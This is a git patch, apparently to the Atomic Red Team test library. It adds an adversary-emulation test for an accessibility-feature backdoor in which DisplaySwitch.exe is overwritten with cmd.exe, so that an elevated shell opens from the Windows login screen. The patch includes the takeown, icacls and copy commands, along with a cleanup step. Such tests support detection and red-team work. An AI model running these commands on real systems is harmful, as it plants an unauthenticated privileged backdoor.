From c1705f86e372d072493c2139174a4dcd86dad563 Mon Sep 17 00:00:00 2001
From: Casey Hennings <caseylhennings@gmail.com>
Date: Mon, 11 Aug 2025 21:05:08 -0400
Subject: [PATCH] Update T1546.008.yaml (#3136)

Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
---
 atomics/T1546.008/T1546.008.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 8f38324a..799f7f79 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -169,3 +169,18 @@ atomic_tests:
       copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
     name: command_prompt
     elevation_required: true
+- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+  description: |
+    Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+      icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+    name: command_prompt
+    elevation_required: true